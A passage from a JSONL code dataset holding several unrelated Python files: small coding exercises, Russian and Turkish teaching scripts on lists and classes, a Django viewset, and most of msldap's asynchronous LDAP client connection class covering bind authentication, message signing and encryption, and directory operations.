]\n)\ndef test_solution(s, expected):\n assert Solution().lengthOfLongestSubstringTwoDistinct(s) == expected\n","repo_name":"yyunikov/coding-python","sub_path":"tests/problems/longest_substr_with_two_dist_chars_test.py","file_name":"longest_substr_with_two_dist_chars_test.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14248623735","text":"from rest_framework import filters, mixins, viewsets\n\nfrom .permissions import IsAdminOrReadOnly\n\n\nclass GetPostDeleteViewSet(\n mixins.CreateModelMixin,\n mixins.DestroyModelMixin,\n mixins.ListModelMixin,\n viewsets.GenericViewSet,\n):\n permission_classes = (IsAdminOrReadOnly,)\n filter_backends = (filters.SearchFilter,)\n search_fields = ('name',)\n lookup_field = 'slug'\n","repo_name":"0z0nize/api_yamdb","sub_path":"api_yamdb/core/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"33007330756","text":"# 1-задание: перевернуть строку \"phew\" -> \"wehp\"___________________________________________________________________________________\n\n# перевернутая копия строки\nstr = \"phew\" [::-1]\nprint(str)\n\n# с помощью встроенной функции reversed\nstr=''.join(reversed('phew'))\nprint(str)\n\n\n# 2 - задание: ____________________________________________________________________________________________________________________\n# У list - списка очень много методов потому что он изменяеиый, можно изменять элементы в списке. А у кортежа всего лишь два метода,\n# потому что он не изменямый тип. \n\n# метод Append ===========================================================================================================\n# добавляет элемент в конец списка\n\nnumbers=['one','two','three']\nnumbers.append('four')\nprint(numbers)\n\n# добавляет список в сущ.список\nnames=['Tom','Leonardo']\nfamily_names=('Hanks', 'DiCaprio')\nnames.append(family_names)\nprint(names)\n\n# метод Count ==============================================================================================================\n# показывает сколько раз был показан заданный элемент в списке\nnumbers = [1, 2, 3, 3, 4]\nx = numbers.count(3)\nprint(x)\n\nnames=[\"Tom\", \"Leo\", \"Tom\"]\nx=names.count(\"Tom\")\nprint(x)\n\n# метод Copy ================================================================================================================== \nseasons=['winter', 'spring', 'summer', 'autumn']\nx=seasons.copy()\nprint(x)\n\n# метод Insert ================================================================================================================ \n# добавляет элемент в определенную позицию\nseasons=['winter', 'summer', 'autumn']\nseasons.insert(1, 'spring')\nprint(seasons)\n\n# метод Sort ================================================================================================================== \n#сортирование списка в алфавитном порядке\nfruits=['banana', 'apple', 'orange']\nfruits.sort()\nprint(fruits)\n\n\n# метод Extend ================================================================================================================\n# добавление двух списков в один\nfruits=['banana', 'apple', 'orange']\nberries=['strawberry', 'raspberry', 'cherry']\nfruits.extend(berries)\nprint(fruits)\n\n# метод pop ================================================================================================================\n# убирает элемент с заданной позиции если ничего не писать никакой индекс, он удалит последнее значение\n# remove удаляет \n\nberries=['strawberry', 'raspberry', 'cherry']\nberries.pop(2)\nprint(berries)\n\n# выводит выбранный элемент\nberries=['strawberry', 'raspberry', 'cherry']\nx=berries.pop(2)\nprint(x)\n\n# метод index ==============================================================================================================\n# показывает под каким индексом находится определ.элемент\nberries=['strawberry', 'raspberry', 'cherry']\nx=berries.index('raspberry')\nprint(x)\n\n# возвращает индекс первого вхождения указанного элемента\n\nberries=['strawberry', 'raspberry', 'cherry', 'strawberry']\nx=berries.index('strawberry')\nprint(x)\n\n\n\n","repo_name":"arssabina/FSPR-422","sub_path":"semester_1/HOMEWORK/les_5_д.з.py","file_name":"les_5_д.з.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13186471765","text":"class Solution:\n def rotate(self, nums: List[int], k: int) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n l = len(nums)\n t = k%l\n if(l==1 or t==0):\n return nums\n nums[:] = nums[-t:] + nums[:l-t]\n # print(nums)\n ","repo_name":"Euicheon/LeetCode","sub_path":"189-rotate-array/189-rotate-array.py","file_name":"189-rotate-array.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39128565543","text":"\"\"\"\nclass Car:\n pass\n\ncar1 = Car()\ncar2 = Car()\nprint(Car)\nprint(car1)\nprint(car2)\n\nclass Products:\n pass\np1 = Products() # macbook air\np2 = Products() # hp pavilion\np3 = Products() # asus zenbook\n\nlistProducts = [p1, p2, p3]\nfor p in listProducts:\n print(p)\n print(type(p))\n\"\"\"\n\n\n# yukarıda \"\" yorum olan bölümde sınıf oluşturmayı öğrendik\n\n\n# Aşağıdaki bölümde de init metodunu kullanmayı öğreneceğiz :)\n\"\"\"\nclass Urunler:\n def __init__(self): # yapıcı method(constructor)\n self.name = \"Mercedes C200\"\n self.price = \"$ 20,000\"\n print(\"Ürün nesnesi olşuturuldu!\")\n\nurun_1 = Urunler()\nurun_2 = Urunler()\n\nprint(urun_1.name, urun_2.name, urun_1.price)\n\"\"\"\n# yukarıda urun_1 ve urun_2 nin farklı nesneler olmasını istiyoruz ama aynı sonuçları alıyoruz!\n# Bu tercih edilen bir kullanım şekli değil :) Adım Adım ilerleyelim\n\n\n# Adım 1, name ve price parametrelerini belirttim.\n# yani her ürün için self parametresi name, price ve isActive parametresi oluşturduk.\n# isActive'i ürün satışta mı sorusu için koydum ve default olarak true tanımladım.\nclass Urunler:\n def __init__(self, name, price, isActive=True):\n self.name = name\n self.price = price\n self.isActive = isActive\n print(\"Ürün nesnesi olşuturuldu!\")\n\n\n# Adım 2 ürünleri tanımladım\n# urun_1 = Urunler(name,price,isActive)\nurun_1 = Urunler(\"Maserati Ghbili\", \"32,000.00 €\")\n# urun_2 = Urunler(name,price,isActive)\nurun_2 = Urunler(\"Subaru XV\", \"44,000.00€\")\n# urun_3 = Urunler(name,price,isActive)\nurun_3 = Urunler(\"Seat Ateca\", \"34,000.00€\", False)\n# eğer isActive = True ise belirtmeye gerek yok, False'u belirtsek yeterli\n\n\n# Adım 3 çıktısını aldım\nprint(urun_1.name, urun_1.price, urun_1.isActive)\nprint(urun_2.name, urun_2.price, urun_2.isActive)\nprint(urun_3.name, urun_3.price, urun_3.isActive)\n\"\"\"\nönemli!!!!!!!!\n__init__() fonksiyonunda self parametresi bu örnekte bizim ürünümüzü temsil ediyor.\nürünümüz ne bir otomobil,\nadı yani markasını name,\nfiyatını price,\nsatışta olup olmadığını isActive ile gördük.\n self'in ne olduğunu asla unutmuyoruz! Self Önemli \n\"\"\"","repo_name":"tunahantatli/BackendTraining","sub_path":"pythonTraining/OOP/create_class.py","file_name":"create_class.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32412638828","text":"import asyncio\n\n\nfrom msldap import logger\nfrom msldap.commons.common import MSLDAPClientStatus\nfrom msldap.protocol.messages import LDAPMessage, BindRequest, \\\n\tprotocolOp, AuthenticationChoice, SaslCredentials, \\\n\tSearchRequest, AttributeDescription, Filter, Filters, \\\n\tControls, Control, SearchControlValue, AddRequest, \\\n\tModifyRequest, DelRequest\n\nfrom msldap.protocol.utils import calcualte_length\nfrom msldap.protocol.typeconversion import convert_result, convert_attributes, encode_attributes, encode_changes\nfrom msldap.protocol.query import escape_filter_chars, query_syntax_converter\nfrom msldap.commons.authbuilder import AuthenticatorBuilder\nfrom msldap.commons.credential import MSLDAP_GSS_METHODS\nfrom msldap.network.selector import MSLDAPNetworkSelector\nfrom msldap.commons.credential import LDAPAuthProtocol\nfrom msldap.commons.target import LDAPProtocol\nfrom asn1crypto.x509 import Certificate\nfrom hashlib import sha256\nfrom minikerberos.gssapi.channelbindings import ChannelBindingsStruct\n\nclass MSLDAPClientConnection:\n\tdef __init__(self, target, creds):\n\t\tself.target = target\n\t\tself.creds = creds\n\t\tself.auth = AuthenticatorBuilder(self.creds, self.target).build()\n\t\tself.connected = False\n\t\tself.bind_ok = False\n\t\tself.__sign_messages = False\n\t\tself.__encrypt_messages = False\n\t\tself.network = None\n\n\t\tself.handle_incoming_task = None\n\t\tself.status = MSLDAPClientStatus.RUNNING\n\t\tself.lasterror = None\n\n\t\tself.message_id = 0\n\t\tself.message_table = {}\n\t\tself.message_table_notify = {}\n\t\tself.encryption_sequence_counter = 0 # this will be set by the inderlying auth algo\n\t\tself.cb_data = None #for channel binding\n\n\tasync def __handle_incoming(self):\n\t\ttry:\n\t\t\twhile True:\n\t\t\t\tmessage_data, err = await self.network.in_queue.get()\n\t\t\t\tif err is not None:\n\t\t\t\t\tlogger.debug('Client terminating bc __handle_incoming got an error!')\n\t\t\t\t\traise err\n\t\t\t\t\n\t\t\t\t#print('Incoming message data: %s' % message_data)\n\t\t\t\tif self.bind_ok is True:\n\t\t\t\t\tif self.__encrypt_messages is True:\n\t\t\t\t\t\t#removing size\n\t\t\t\t\t\tmessage_data = message_data[4:]\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t# seq number doesnt matter here, a it's in the header\n\t\t\t\t\t\t\tmessage_data, err = await self.auth.decrypt(message_data, 0 )\n\t\t\t\t\t\t\tif err is not None:\n\t\t\t\t\t\t\t\traise err\n\t\t\t\t\t\t\t#print('Decrypted %s' % message_data.hex())\n\t\t\t\t\t\t\t#print('Decrypted %s' % message_data)\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\timport traceback\n\t\t\t\t\t\t\ttraceback.print_exc()\n\t\t\t\t\t\t\traise\n\t\t\t\t\t\t\n\t\t\t\t\telif self.__sign_messages is True:\n\t\t\t\t\t\t#print('Signed %s' % message_data)\n\t\t\t\t\t\tmessage_data = message_data[4:]\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tmessage_data = await self.auth.unsign(message_data)\n\t\t\t\t\t\t#\tprint('Unsinged %s' % message_data)\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\timport traceback\n\t\t\t\t\t\t\ttraceback.print_exc()\n\t\t\t\t\t\t\traise\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tmsg_len = calcualte_length(message_data)\n\t\t\t\tmsg_total_len = len(message_data)\n\t\t\t\tmessages = []\n\t\t\t\tif msg_len == msg_total_len:\n\t\t\t\t\tmessage = LDAPMessage.load(message_data)\n\t\t\t\t\tmessages.append(message)\n\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\t#print('multi-message!')\n\t\t\t\t\twhile len(message_data) > 0:\n\t\t\t\t\t\tmsg_len = calcualte_length(message_data)\n\t\t\t\t\t\tmessage = LDAPMessage.load(message_data[:msg_len])\n\t\t\t\t\t\tmessages.append(message)\n\t\t\t\t\t\t\n\t\t\t\t\t\tmessage_data = message_data[msg_len:]\n\n\t\t\t\tmessage_id = messages[0]['messageID'].native\n\t\t\t\tif message_id not in self.message_table:\n\t\t\t\t\tself.message_table[message_id] = []\n\t\t\t\tself.message_table[message_id].extend(messages)\n\t\t\t\tif message_id not in self.message_table_notify:\n\t\t\t\t\tself.message_table_notify[message_id] = asyncio.Event()\n\t\t\t\tself.message_table_notify[message_id].set()\n\t\t\n\t\texcept asyncio.CancelledError:\n\t\t\tself.status = MSLDAPClientStatus.STOPPED\n\t\t\treturn\n\n\t\texcept Exception as e:\n\t\t\tself.status = MSLDAPClientStatus.ERROR\n\t\t\tself.lasterror = e\n\t\t\tfor msgid in self.message_table_notify:\n\t\t\t\tself.message_table[msgid] = [e]\n\t\t\t\tself.message_table_notify[msgid].set()\n\t\t\n\t\tself.status = MSLDAPClientStatus.STOPPED\n\n\n\tasync def send_message(self, message):\n\t\tcurr_msg_id = self.message_id\n\t\tself.message_id += 1\n\n\t\tmessage['messageID'] = curr_msg_id\n\t\tmessage_data = LDAPMessage(message).dump()\n\n\t\tif self.bind_ok is True:\n\t\t\tif self.__encrypt_messages is True:\n\t\t\t\tmessage_data, signature = await self.auth.encrypt(message_data, self.encryption_sequence_counter)\n\t\t\t\tmessage_data = signature + message_data\n\t\t\t\tmessage_data = len(message_data).to_bytes(4, byteorder = 'big', signed = False) + message_data\n\t\t\t\tself.encryption_sequence_counter += 1\n\t\t\telif self.__sign_messages is True:\n\t\t\t\tsignature = await self.auth.sign(message_data, self.encryption_sequence_counter)\n\t\t\t\tmessage_data = signature + message_data\n\t\t\t\tmessage_data = len(message_data).to_bytes(4, byteorder = 'big', signed = False) + message_data\n\t\t\t\tself.encryption_sequence_counter += 1\n\t\t\n\t\tself.message_table_notify[curr_msg_id] = asyncio.Event()\n\t\tawait self.network.out_queue.put(message_data)\n\n\t\treturn curr_msg_id\n\n\tasync def recv_message(self, message_id):\n\t\tif message_id not in self.message_table_notify:\n\t\t\tlogger.debug('Requested message id %s which is not in the message notify table!' % message_id)\n\t\t\treturn None\n\t\t#print('Waiting for %s' % message_id)\n\t\tawait self.message_table_notify[message_id].wait()\n\t\t#print(self.message_table)\n\t\tmessages = self.message_table[message_id]\n\n\t\t#print('%s arrived!' % message_id)\n\n\t\tself.message_table[message_id] = []\n\t\tself.message_table_notify[message_id].clear()\n\n\t\treturn messages\n\n\tasync def connect(self):\n\t\t\"\"\"\n\t\tConnects to the remote server. Establishes the session, but doesn't perform binding.\n\t\tThis function MUST be called first before the `bind` operation.\n\n\t\t:return: A tuple of (True, None) on success or (False, Exception) on error. \n\t\t:rtype: (:class:`bool`, :class:`Exception`)\n\t\t\"\"\"\n\t\ttry:\n\t\t\tlogger.debug('Connecting!')\n\t\t\tself.network = await MSLDAPNetworkSelector.select(self.target)\n\t\t\tres, err = await self.network.run()\n\t\t\tif res is False:\n\t\t\t\treturn False, err\n\t\t\t\n\t\t\t# now processing channel binding options\n\t\t\tif self.target.proto == LDAPProtocol.SSL:\n\t\t\t\tcertdata = self.network.get_peer_certificate()\n\t\t\t\t#cert = Certificate.load(certdata).native\n\t\t\t\t#print(cert)\n\t\t\t\tcb_struct = ChannelBindingsStruct()\n\t\t\t\tcb_struct.application_data = b'tls-server-end-point:' + sha256(certdata).digest()\n\n\t\t\t\tself.cb_data = cb_struct.to_bytes()\n\n\t\t\tself.handle_incoming_task = asyncio.create_task(self.__handle_incoming())\n\t\t\tlogger.debug('Connection succsessful!')\n\t\t\treturn True, None\n\t\texcept Exception as e:\n\t\t\treturn False, e\n\n\tasync def disconnect(self):\n\t\t\"\"\"\n\t\tTears down the connection.\n\n\t\t:return: Nothing\n\t\t:rtype: None\n\t\t\"\"\"\n\n\t\tlogger.debug('Disconnecting!')\n\t\tself.bind_ok = False\n\t\tself.handle_incoming_task.cancel()\n\t\tawait self.network.terminate()\n\n\n\tdef __bind_success(self):\n\t\t\"\"\"\n\t\tInternal function invoked after bind finished. \n\t\tInstructs the network layer that upcoming messages might be wrapped\n\t\t\"\"\"\n\t\tlogger.debug('BIND Success!')\n\t\tself.bind_ok = True\n\t\tif self.creds.auth_method in MSLDAP_GSS_METHODS or self.creds.auth_method == LDAPAuthProtocol.SICILY:\n\t\t\tself.__sign_messages = self.auth.signing_needed()\n\t\t\tself.__encrypt_messages = self.auth.encryption_needed()\n\t\t\tif self.__encrypt_messages or self.__sign_messages:\n\t\t\t\tself.network.is_plain_msg = False\n\n\tasync def bind(self):\n\t\t\"\"\"\n\t\tPerforms the bind operation.\n\t\tThis is where the authentication happens. Remember to call `connect` before this function!\n\n\t\t:return: A tuple of (True, None) on success or (False, Exception) on error. \n\t\t:rtype: (:class:`bool`, :class:`Exception`)\n\t\t\"\"\"\n\t\tlogger.debug('BIND in progress...')\n\t\ttry:\n\t\t\tif self.creds.auth_method == LDAPAuthProtocol.SICILY:\n\t\t\t\t\n\t\t\t\tdata, to_continue, err = await self.auth.authenticate(None)\n\t\t\t\tif err is not None:\n\t\t\t\t\treturn None, err\n\n\t\t\t\tauth = {\n\t\t\t\t\t'sicily_disco' : b''\n\t\t\t\t}\n\n\t\t\t\tbindreq = {\n\t\t\t\t\t'version' : 3,\n\t\t\t\t\t'name' : 'NTLM'.encode(),\n\t\t\t\t\t'authentication': AuthenticationChoice(auth), \n\t\t\t\t}\n\n\t\t\t\tbr = { 'bindRequest' : BindRequest( bindreq\t)}\n\t\t\t\tmsg = { 'protocolOp' : protocolOp(br)}\n\t\t\t\t\n\t\t\t\tmsg_id = await self.send_message(msg)\n\t\t\t\tres = await self.recv_message(msg_id)\n\t\t\t\tres = res[0]\n\t\t\t\tif isinstance(res, Exception):\n\t\t\t\t\treturn False, res\n\t\t\t\tres = res.native\n\t\t\t\tif res['protocolOp']['resultCode'] != 'success':\n\t\t\t\t\treturn False, Exception(\n\t\t\t\t\t\t'BIND failed! Result code: \"%s\" Reason: \"%s\"' % (\n\t\t\t\t\t\t\tres['protocolOp']['resultCode'], \n\t\t\t\t\t\t\tres['protocolOp']['diagnosticMessage']\n\t\t\t\t\t\t))\n\t\t\t\t\n\t\t\t\tauth = {\n\t\t\t\t\t'sicily_nego' : data\n\t\t\t\t}\n\n\t\t\t\tbindreq = {\n\t\t\t\t\t'version' : 3,\n\t\t\t\t\t'name' : 'NTLM'.encode(),\n\t\t\t\t\t'authentication': AuthenticationChoice(auth), \n\t\t\t\t}\n\n\t\t\t\tbr = { 'bindRequest' : BindRequest( bindreq\t)}\n\t\t\t\tmsg = { 'protocolOp' : protocolOp(br)}\n\t\t\t\t\n\t\t\t\tmsg_id = await self.send_message(msg)\n\t\t\t\tres = await self.recv_message(msg_id)\n\t\t\t\tres = res[0]\n\t\t\t\tif isinstance(res, Exception):\n\t\t\t\t\treturn False, res\n\t\t\t\tres = res.native\n\t\t\t\tif res['protocolOp']['resultCode'] != 'success':\n\t\t\t\t\treturn False, Exception(\n\t\t\t\t\t\t'BIND failed! Result code: \"%s\" Reason: \"%s\"' % (\n\t\t\t\t\t\t\tres['protocolOp']['resultCode'], \n\t\t\t\t\t\t\tres['protocolOp']['diagnosticMessage']\n\t\t\t\t\t\t))\n\n\t\t\t\tdata, to_continue, err = await self.auth.authenticate(res['protocolOp']['matchedDN'])\n\t\t\t\tif err is not None:\n\t\t\t\t\treturn None, err\n\n\t\t\t\tauth = {\n\t\t\t\t\t'sicily_resp' : data\n\t\t\t\t}\n\n\t\t\t\tbindreq = {\n\t\t\t\t\t'version' : 3,\n\t\t\t\t\t'name' : 'NTLM'.encode(),\n\t\t\t\t\t'authentication': AuthenticationChoice(auth), \n\t\t\t\t}\n\n\t\t\t\tbr = { 'bindRequest' : BindRequest( bindreq\t)}\n\t\t\t\tmsg = { 'protocolOp' : protocolOp(br)}\n\t\t\t\t\n\t\t\t\tmsg_id = await self.send_message(msg)\n\t\t\t\tres = await self.recv_message(msg_id)\n\t\t\t\tres = res[0]\n\t\t\t\tif isinstance(res, Exception):\n\t\t\t\t\treturn False, res\n\t\t\t\tres = res.native\n\t\t\t\tif res['protocolOp']['resultCode'] != 'success':\n\t\t\t\t\treturn False, Exception(\n\t\t\t\t\t\t'BIND failed! Result code: \"%s\" Reason: \"%s\"' % (\n\t\t\t\t\t\t\tres['protocolOp']['resultCode'], \n\t\t\t\t\t\t\tres['protocolOp']['diagnosticMessage']\n\t\t\t\t\t\t))\n\t\t\t\t\n\n\t\t\t\tself.__bind_success()\n\t\t\t\treturn True, None\n\n\t\t\telif self.creds.auth_method == LDAPAuthProtocol.SIMPLE:\n\t\t\t\tpw = b''\n\t\t\t\tif self.auth.password != None:\n\t\t\t\t\tpw = self.auth.password.encode()\n\n\t\t\t\tuser = b''\n\t\t\t\tif self.auth.username != None:\n\t\t\t\t\tuser = self.auth.username.encode()\n\n\t\t\t\tauth = {\n\t\t\t\t\t'simple' : pw\n\t\t\t\t}\n\n\t\t\t\tbindreq = {\n\t\t\t\t\t'version' : 3,\n\t\t\t\t\t'name': user,\n\t\t\t\t\t'authentication': AuthenticationChoice(auth), \n\t\t\t\t}\n\n\t\t\t\tbr = { 'bindRequest' : BindRequest( bindreq\t)}\n\t\t\t\tmsg = { 'protocolOp' : protocolOp(br)}\n\t\t\t\t\t\n\t\t\t\tmsg_id = await self.send_message(msg)\n\t\t\t\tres = await self.recv_message(msg_id)\n\t\t\t\tres = res[0]\n\t\t\t\tif isinstance(res, Exception):\n\t\t\t\t\treturn False, res\n\t\t\t\tres = res.native\n\t\t\t\tif res['protocolOp']['resultCode'] == 'success':\n\t\t\t\t\tself.__bind_success()\n\t\t\t\t\treturn True, None\n\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\treturn False, Exception(\n\t\t\t\t\t\t'BIND failed! Result code: \"%s\" Reason: \"%s\"' % (\n\t\t\t\t\t\t\tres['protocolOp']['resultCode'], \n\t\t\t\t\t\t\tres['protocolOp']['diagnosticMessage']\n\t\t\t\t\t\t))\n\n\t\t\telif self.creds.auth_method in MSLDAP_GSS_METHODS:\n\t\t\t\tchallenge = None\n\t\t\t\twhile True:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tdata, to_continue, err = await self.auth.authenticate(challenge, cb_data = self.cb_data)\n\t\t\t\t\t\tif err is not None:\n\t\t\t\t\t\t\traise err\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\treturn False, e\n\t\t\t\t\t\n\t\t\t\t\tsasl = {\n\t\t\t\t\t\t'mechanism' : 'GSS-SPNEGO'.encode(),\n\t\t\t\t\t\t'credentials' : data,\n\t\t\t\t\t}\n\t\t\t\t\tauth = {\n\t\t\t\t\t\t'sasl' : SaslCredentials(sasl)\n\t\t\t\t\t}\n\n\t\t\t\t\tbindreq = {\n\t\t\t\t\t\t'version' : 3,\n\t\t\t\t\t\t'name': b'',\n\t\t\t\t\t\t'authentication': AuthenticationChoice(auth), \n\t\t\t\t\t}\n\n\t\t\t\t\tbr = { 'bindRequest' : BindRequest( bindreq\t)}\n\t\t\t\t\tmsg = { 'protocolOp' : protocolOp(br)}\n\t\t\t\t\t\n\t\t\t\t\tmsg_id = await self.send_message(msg)\n\t\t\t\t\tres = await self.recv_message(msg_id)\n\t\t\t\t\tres = res[0]\n\t\t\t\t\tif isinstance(res, Exception):\n\t\t\t\t\t\treturn False, res\n\t\t\t\t\tres = res.native\n\t\t\t\t\tif res['protocolOp']['resultCode'] == 'success':\n\t\t\t\t\t\tif 'serverSaslCreds' in res['protocolOp']:\n\t\t\t\t\t\t\tdata, _, err = await self.auth.authenticate(res['protocolOp']['serverSaslCreds'], cb_data = self.cb_data)\n\t\t\t\t\t\t\tif err is not None:\n\t\t\t\t\t\t\t\treturn False, err\n\n\t\t\t\t\t\tself.encryption_sequence_counter = self.auth.get_seq_number()\n\t\t\t\t\t\tself.__bind_success()\n\n\t\t\t\t\t\treturn True, None\n\n\t\t\t\t\telif res['protocolOp']['resultCode'] == 'saslBindInProgress':\n\t\t\t\t\t\tchallenge = res['protocolOp']['serverSaslCreds']\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn False, Exception(\n\t\t\t\t\t\t\t'BIND failed! Result code: \"%s\" Reason: \"%s\"' % (\n\t\t\t\t\t\t\t\tres['protocolOp']['resultCode'], \n\t\t\t\t\t\t\t\tres['protocolOp']['diagnosticMessage']\n\t\t\t\t\t\t\t))\n\t\t\t\t\t\n\t\t\telse:\n\t\t\t\traise Exception('Not implemented authentication method: %s' % self.creds.auth_method.name)\n\t\texcept Exception as e:\n\t\t\treturn False, e\n\n\tasync def add(self, entry, attributes):\n\t\t\"\"\"\n\t\tPerforms the add operation.\n\t\t\n\t\t:param entry: The DN of the object to be added\n\t\t:type entry: str\n\t\t:param attributes: Attributes to be used in the operation\n\t\t:type attributes: dict\n\t\t:return: A tuple of (True, None) on success or (False, Exception) on error. \n\t\t:rtype: (:class:`bool`, :class:`Exception`)\n\t\t\"\"\"\n\t\ttry:\n\t\t\treq = {\n\t\t\t\t'entry' : entry.encode(),\n\t\t\t\t'attributes' : encode_attributes(attributes)\n\t\t\t}\n\t\t\tbr = { 'addRequest' : AddRequest(req)}\n\t\t\tmsg = { 'protocolOp' : protocolOp(br)}\n\t\t\t\n\t\t\tmsg_id = await self.send_message(msg)\n\t\t\tresults = await self.recv_message(msg_id)\n\t\t\tif isinstance(results[0], Exception):\n\t\t\t\treturn False, results[0]\n\t\t\t\n\t\t\tfor message in results:\n\t\t\t\tmsg_type = message['protocolOp'].name\n\t\t\t\tmessage = message.native\n\t\t\t\tif msg_type == 'addResponse':\n\t\t\t\t\tif message['protocolOp']['resultCode'] != 'success':\n\t\t\t\t\t\treturn False, Exception('Failed to add DN! LDAP error! Reason: %s Diag: %s' % (\n\t\t\t\t\t\t\tmessage['protocolOp']['resultCode'],\n\t\t\t\t\t\t\tmessage['protocolOp']['diagnosticMessage'])\n\t\t\t\t\t\t)\n\n\t\t\treturn True, None\n\t\texcept Exception as e:\n\t\t\treturn False, e\n\n\tasync def modify(self, entry, changes, controls = None):\n\t\t\"\"\"\n\t\tPerforms the modify operation.\n\t\t\n\t\t:param entry: The DN of the object whose attributes are to be modified\n\t\t:type entry: str\n\t\t:param changes: Describes the changes to be made on the object. Must be a dictionary of the following format: {'attribute': [('change_type', [value])]}\n\t\t:type changes: dict\n\t\t:param controls: additional controls to be passed in the query\n\t\t:type controls: dict\n\t\t:return: A tuple of (True, None) on success or (False, Exception) on error. \n\t\t:rtype: (:class:`bool`, :class:`Exception`)\n\t\t\"\"\"\n\t\ttry:\n\t\t\treq = {\n\t\t\t\t'object' : entry.encode(),\n\t\t\t\t'changes' : encode_changes(changes)\n\t\t\t}\n\t\t\tbr = { 'modifyRequest' : ModifyRequest(req)}\n\t\t\tmsg = { 'protocolOp' : protocolOp(br)}\n\t\t\tif controls is not None:\n\t\t\t\tmsg['controls'] = controls\n\t\t\t\n\t\t\tmsg_id = await self.send_message(msg)\n\t\t\tresults = await self.recv_message(msg_id)\n\t\t\tif isinstance(results[0], Exception):\n\t\t\t\treturn False, results[0]\n\t\t\t\n\t\t\tfor message in results:\n\t\t\t\tmsg_type = message['protocolOp'].name\n\t\t\t\tmessage = message.native\n\t\t\t\tif msg_type == 'modifyResponse':\n\t\t\t\t\tif message['protocolOp']['resultCode'] != 'success':\n\t\t\t\t\t\treturn False, Exception('Failed to add DN! LDAP error! Reason: %s Diag: %s' % (\n\t\t\t\t\t\t\tmessage['protocolOp']['resultCode'],\n\t\t\t\t\t\t\tmessage['protocolOp']['diagnosticMessage'])\n\t\t\t\t\t\t)\n\n\t\t\treturn True, None\n\t\texcept Exception as e:\n\t\t\treturn False, e\n\n\tasync def delete(self, entry):\n\t\t\"\"\"\n\t\tPerforms the delete operation.\n\t\t\n\t\t:param entry: The DN of the object to be deleted\n\t\t:type entry: str\n\t\t:return: A tuple of (True, None) on success or (False, Exception) on error. \n\t\t:rtype: (:class:`bool`, :class:`Exception`)\n\t\t\"\"\"\n\t\ttry:\n\t\t\tbr = { 'delRequest' : DelRequest(entry.encode())}\n\t\t\tmsg = { 'protocolOp' : protocolOp(br)}\n\t\t\t\n\t\t\tmsg_id = await self.send_message(msg)\n\t\t\tresults = await self.recv_message(msg_id)\n\t\t\tif isinstance(results[0], Exception):\n\t\t\t\treturn False, results[0]\n\t\t\t\n\t\t\tfor message in results:\n\t\t\t\tmsg_type = message['protocolOp'].name\n\t\t\t\tmessage = message.native\n\t\t\t\tif msg_type == 'delResponse':\n\t\t\t\t\tif message['protocolOp']['resultCode'] != 'success':\n\t\t\t\t\t\treturn False, Exception('Failed to add DN! LDAP error! Reason: %s Diag: %s' % (\n\t\t\t\t\t\t\tmessage['protocolOp']['resultCode'],\n\t\t\t\t\t\t\tmessage['protocolOp']['diagnosticMessage'])\n\t\t\t\t\t\t)\n\n\t\t\treturn True, None\n\t\texcept Exception as e:\n\t\t\treturn False, e\n\t\n\tasync def search(self, base, query, attributes, search_scope = 2, size_limit = 1000, types_only = False, derefAliases = 0, timeLimit = None, controls = None, return_done = False):\n\t\t\"\"\"\n\t\tPerforms the search operation.\n\t\t\n\t\t:param base: base tree on which the search should be performed\n\t\t:type base: str\n\t\t:param query: filter query that defines what should be searched for\n\t\t:type query: str\n\t\t:param attributes: a list of attributes to be included in the response\n\t\t:type attributes: List[str]\n\t\t:param search_scope: Specifies the search operation's scope. Default: 2 (Subtree)\n\t\t:type search_scope: int\n\t\t:param types_only: indicates whether the entries returned should include attribute types only or both types and values. Default: False (both)\n\t\t:type types_only: bool\n\t\t:param size_limit: Size limit of result elements per query. Default: 1000\n\t\t:type size_limit: int\n\t\t:param derefAliases: Specifies the behavior on how aliases are dereferenced. Default: 0 (never)\n\t\t:type derefAliases: int\n\t\t:param timeLimit: Maximum time the search should take. If time limit reached the server SHOULD return an error\n\t\t:type timeLimit: int\n\t\t:param controls: additional controls to be passed in the query\n\t\t:type controls: dict\n\t\t:param return_done: Controls wether the final 'done' LDAP message should be returned, or just the actual results\n\t\t:type return_done: bool\n\n\t\t:return: Async generator which yields (`LDAPMessage`, None) tuple on success or (None, `Exception`) on error\n\t\t:rtype: Iterator[(:class:`LDAPMessage`, :class:`Exception`)]\n\t\t\"\"\"\n\t\tif self.status != MSLDAPClientStatus.RUNNING:\n\t\t\tyield None, Exception('Connection not running! Probably encountered an error')\n\t\t\treturn\n\t\ttry:\n\t\t\tif timeLimit is None:\n\t\t\t\ttimeLimit = 600 #not sure\n\n\t\t\tflt = query_syntax_converter(query)\n\t\t\t\n\t\t\tsearchreq = {\n\t\t\t\t'baseObject' : base.encode(),\n\t\t\t\t'scope': search_scope,\n\t\t\t\t'derefAliases': derefAliases, \n\t\t\t\t'sizeLimit': size_limit,\n\t\t\t\t'timeLimit': timeLimit,\n\t\t\t\t'typesOnly': types_only,\n\t\t\t\t'filter': flt,\n\t\t\t\t'attributes': attributes,\n\t\t\t}\n\n\t\t\tbr = { 'searchRequest' : SearchRequest( searchreq\t)}\n\t\t\tmsg = { 'protocolOp' : protocolOp(br)}\n\t\t\tif 